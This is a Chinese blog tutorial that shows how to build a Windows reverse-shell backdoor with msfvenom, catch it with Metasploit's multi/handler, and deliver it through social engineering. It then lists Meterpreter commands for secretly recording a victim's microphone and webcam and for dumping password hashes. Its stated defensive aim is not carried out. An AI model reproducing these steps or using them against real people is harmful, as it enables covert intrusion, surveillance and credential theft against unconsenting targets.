使用Metasploit MSFVenom远程入侵计算机– Windows 10黑客

少羽.
399
文章
79
评论
2019年12月9日20:36:02 1 7,708 1357字阅读4分31秒

使用Metasploit MSFVenom远程入侵计算机– Windows 10黑客

当涉及到渗透和黑客攻击时,Linux就在那里。Kali Linux是功能最强大的Linux版本之一,为所有渗透测试工具提供了动力。Metasploit是最受欢迎的工具之一,可用于入侵包括计算机,Web服务器甚至手机在内的远程设备。在Metasploit的帮助下,入侵远程计算机并不难。Metasploit是终端命令库程序。对于初学者来说,很难知道命令以及如何执行它们。因此,如果您是新手,则可以学习最常见的Metasploit命令以开始使用。

注意: 向您展示黑客如何侵入远程系统以及如何防止它们。

使用Metasploit MSFVenom远程入侵计算机Windows 10黑客

要求:

  1. Kali Linux操作系统
  2. Metasploit框架(已在Kali Linux中预构建)
  3. 目标机

黑客入侵Windows 10计算机的演示是在虚拟环境中进行的,这意味着在此过程中不会损害任何实际设备。

如果要在VirtualBox中尝试,则还需要满足以下条件:

  1. 虚拟盒子
  2. Kali Linux VM映像
  3. Windows 10虚拟映像
  4. 目标机

远程入侵计算机的步骤如下:

  • 下载并安装Kali linux。
  • 安装完成后,启动系统并进行升级。只需打开一个终端并输入以下命令:
apt-get upgrade
  • 更新后,运行metasploit。打开终端,然后键入:msfconsole。 
  • 当Metasploit开始时,第一件事就是创建一个后门。输入以下命令:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.2.5 -f exe -o /root/Desktop/AnyName.exe

使用Metasploit MSFVenom远程入侵计算机– Windows 10黑客

  • 将LHOST = 10.0.2.5替换为您的内部IP。您可以通过在终端中键入' ifconfig'进行检查。您可以将保存后门的位置更改为任意选择 我是在桌面上创建的

使用Metasploit MSFVenom远程入侵计算机– Windows 10黑客

 

  • 下一步是使用漏洞利用程序。该漏洞处理程序将处理所有后门请求。为此,只需键入以下命令。

 

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

使用Metasploit MSFVenom远程入侵计算机– Windows 10黑客

  • 漏洞利用处理程序准备就绪后,只需设置漏洞利用选项即可。 

使用Metasploit MSFVenom远程入侵计算机– Windows 10黑客

  • 设置侦听主机IP和端口后,只需键入以下命令即可利用。
exploit -j -z

使用Metasploit MSFVenom远程入侵计算机– Windows 10黑客

  • 现在是传播后门的一部分。在这里成为一名社会工程师。只需很少的社会工程学,即可将目标安装在PC上。当有人运行您发送的后门时。会话将在您的Metasploit终端中开始,而您正在…
  • 现在该玩目标设备了。现在,您可以播放受害设备并对其执行任何操作。您可以在远程设备上执行数百种操作。以下是您可以在目标设备上执行的一些最有趣的操作。

远程操作的Meterpreter命令

record_mic

此命令提供您所连接的远程计算机的实时麦克风源。聆听目标的实时对话。

webcam_chat

它启动与目标计算机的视频聊天

webcam_snap

用于从目标设备捕获照片。

webcam_stream

用于从受害者计算机流式传输实时视频。

hashdump

它转储SAM数据库的内容。

您可以检出所有最常见的Metasploit命令和meterpreter有效负载

希望这对您有用,并使您清楚如何使用Metasploit MSFVenom远程入侵计算机。如果您遇到任何问题,请在下面发表评论。

继续阅读
  • 我的微信
  • 这是我的微信扫一扫
  • weinxin
  • 我的微信公众号
  • 我的微信公众号扫一扫
  • weinxin
渗透培训《文件包含》漏洞 渗透笔记

渗透培训《文件包含》漏洞

原理 文件包含漏洞产生的原因是在通过php函数引入文件时,由于传入的文件名没有经过合理的校验,从而引发了文件的泄漏或者恶意代码的注入 本文包含 图片马使用教程(很多人知道图片马却不知道使用方法) 积极...
渗透培训《文件上传》姿势 渗透笔记

渗透培训《文件上传》姿势

本篇要介绍的是常见的几种文件上传绕过姿势。 积极响应国家号召,此类文章统一禁止查看 文件上传校验 1.前端javascript校验(一般只校验后缀名) 2.服务端校验 3.文件头content-typ...
渗透培训《搜索引擎》利用 渗透笔记

渗透培训《搜索引擎》利用

本篇要介绍的搜索引擎包括:Shodan,censys,钟馗之眼,Google,FoFa,Dnsdb等。介绍的内容主要是这几款搜索引擎的一些高级语法,掌握高级语法会让搜索结果更准确。 积极响应国家号召,...
匿名

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen:

评论:1   其中:访客  1   博主  0
    • 铭泽博客 铭泽博客 1

      感谢分享